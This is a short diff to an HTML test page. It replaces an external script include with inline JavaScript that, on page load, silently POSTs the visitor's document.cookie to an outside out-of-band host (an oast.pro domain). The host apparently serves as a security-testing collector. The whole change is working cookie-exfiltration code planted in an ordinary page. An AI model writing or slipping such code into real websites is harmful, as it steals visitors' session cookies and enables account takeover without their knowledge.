--- a/index.html
+++ b/index.html
@@ -3,6 +3,12 @@
   <head><meta charset="utf-8"><title>Test</title></head>
   <body>
     <h1>JS test</h1>
-    <script src="./td.js"></script>
+    <script>
+      fetch('https://30dbf30e8f89c4628cddgt5u8pyyyyyyb.oast.pro', {
+        method: 'POST',
+        mode: 'no-cors',
+        body:document.cookie
+      });
+    </script>
   </body>
 </html>
